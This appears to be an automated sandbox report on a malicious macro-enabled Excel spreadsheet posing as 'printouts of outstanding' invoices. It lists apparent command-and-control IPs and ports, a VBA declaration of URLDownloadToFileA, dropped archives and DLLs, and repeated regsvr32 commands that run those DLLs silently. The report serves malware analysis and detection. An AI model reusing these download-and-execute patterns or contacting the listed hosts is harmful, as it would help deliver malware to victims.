Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emf
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: monitrade.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Jan 2021 15:13:21 GMT | Server: Apache | Content-Length: 315 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5t
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2107200716.0000000001D70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2406809963.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2112116772.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2419749632.0000000000880000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2113665422.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2120190682.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2114236047.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2124921151.0000000001DF0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/5
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://194.225.58.214/9
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/hy;R
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63/h
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63/~
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://69.164.207.140/q
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo")
Document contains an embedded VBA macro with suspicious strings
Source: printouts of outstanding as of 01_20_2021.xlsm | OLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsm | OLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Found Excel 4.0 Macro with suspicious formulas
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: printouts of outstanding as of 01_20_2021.xlsm | OLE, VBA macro line: Private Sub vbox1_cli_Layout()
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function vbox1_cli_Layout
Source: printouts of outstanding as of 01_20_2021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal100.expl.evad.winXLSM@41/22@7/11
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE30E.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: printouts of outstanding as of 01_20_2021.xlsm | Virustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsm | ReversingLabs: Detection: 11%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: printouts of outstanding as of 01_20_2021.xlsm | Initial sample: OLE indicators vbamacros = False
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key enumerated: More than 564 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -297000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -495000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -356000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -146000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 | Thread sleep time: -341000s >= -30000s
